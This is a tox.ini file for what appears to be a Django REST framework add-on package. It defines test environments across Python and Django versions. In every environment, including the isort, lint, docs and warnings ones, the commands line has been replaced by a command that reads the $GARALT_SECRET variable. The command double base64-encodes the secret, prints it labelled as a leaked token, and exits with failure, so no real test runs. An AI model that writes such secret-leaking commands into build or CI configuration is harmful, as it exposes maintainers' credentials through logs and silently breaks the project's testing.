[tox]
envlist =
       {py310, py311, py312, py313}-django52,
       {py312, py313}-django60,
       {py312, py313}-latest,
       isort,lint,docs,warnings,
isolated_build = true


[latest]
deps =
    https://github.com/django/django/archive/main.tar.gz
    https://github.com/encode/django-rest-framework/archive/master.tar.gz

[testenv]
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1
setenv =
       PYTHONDONTWRITEBYTECODE=1
deps =
    django52: Django>=5.2,<6.0
    django60: Django>=6.0a1,<6.1
    !latest: djangorestframework
    latest: {[latest]deps}
    -r requirements/test-ci.txt

[testenv:isort]
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1
deps = isort

[testenv:lint]
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1
deps = flake8

[testenv:docs]
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1
deps =
    -rrequirements/docs.txt

[testenv:warnings]
ignore_outcome = True
unignore_outcomes = True
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1
deps =
    {[latest]deps}
    -rrequirements/test-ci.txt
